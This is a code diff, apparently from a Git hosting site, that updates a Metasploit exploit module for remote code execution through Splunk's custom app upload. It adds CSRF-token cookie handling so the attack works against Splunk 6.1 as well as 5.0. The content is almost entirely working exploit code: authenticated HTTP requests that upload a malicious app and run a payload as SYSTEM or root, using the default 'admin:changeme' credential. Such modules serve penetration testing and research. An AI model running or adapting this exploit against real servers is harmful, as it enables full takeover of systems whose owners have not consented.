Add #3463 commits from @ghost
parent
4eeab66ebe
commit
c14b96f02e
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Splunk 5.0 Custom App Remote Code Execution',
|
||||
'Name' => 'Splunk Custom App Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a feature of Splunk whereby a custom application can be
|
||||
uploaded through the web based interface. Through the 'script' search command a
|
||||
|
@ -20,14 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
perl or python code. To abuse this behavior, a valid Splunk user with the admin
|
||||
role is required. By default, this module uses the credential of "admin:changeme",
|
||||
the default Administrator credential for Splunk. Note that the Splunk web interface
|
||||
runs as SYSTEM on Windows, or as root on Linux by default. This module has only
|
||||
been tested successfully against Splunk 5.0.
|
||||
runs as SYSTEM on Windows, or as root on Linux by default. This module has been
|
||||
tested successfully against Splunk 5.0, 6.1, and 6.1.1.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
"marcwickenden", # discovery and metasploit module
|
||||
"sinn3r", # metasploit module
|
||||
"juan vazquez" # metasploit module
|
||||
"juan vazquez", # metasploit module
|
||||
"Gary Blosser" # metasploit module updates for Splunk 6.1
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -44,13 +45,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => %w{ linux unix win },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Splunk 5.0.1 / Linux',
|
||||
[ 'Splunk >= 5.0.1 / Linux',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => %w{ linux unix }
|
||||
}
|
||||
],
|
||||
[ 'Splunk 5.0.1 / Windows',
|
||||
[ 'Splunk >= 5.0.1 / Windows',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'win'
|
||||
|
@ -96,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# set up some variables for later use
|
||||
@auth_cookies = ''
|
||||
@csrf_form_key = ''
|
||||
@csrf_form_port = "splunkweb_csrf_token_#{rport}" #Default to using rport, corrected during tokenization for v6 below.
|
||||
app_name = 'upload_app_exec'
|
||||
p = payload.encoded
|
||||
print_status("Using command: #{p}")
|
||||
|
@ -121,11 +123,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'uri' => '/en-US/api/search/jobs',
|
||||
'method' => 'POST',
|
||||
'cookie' => @auth_cookies,
|
||||
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
|
||||
'headers' =>
|
||||
{
|
||||
'X-Requested-With' => 'XMLHttpRequest',
|
||||
'X-Splunk-Form-Key' => @csrf_form_key
|
||||
'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified)
|
||||
},
|
||||
'vars_post' =>
|
||||
{
|
||||
|
@ -274,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi({
|
||||
'uri' => '/en-US/manager/appinstall/_upload',
|
||||
'method' => 'POST',
|
||||
'cookie' => @auth_cookies,
|
||||
'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'data' => data
|
||||
}, 30)
|
||||
|
@ -294,8 +296,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'cookie' => @auth_cookies
|
||||
})
|
||||
res.body.match(/FORM_KEY":\ "(\d+)"/)
|
||||
res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
|
||||
@csrf_form_key = $1
|
||||
|
||||
unless @csrf_form_key # Version 6
|
||||
res.get_cookies.split(';').each {|c|
|
||||
c.split(',').each {|v|
|
||||
if v.split('=')[0] =~ /splunkweb_csrf_token/ #regex as the full name is something like splunkweb_csrf_token_8000
|
||||
@csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
|
||||
@csrf_form_key = v.split('=')[1]
|
||||
end
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue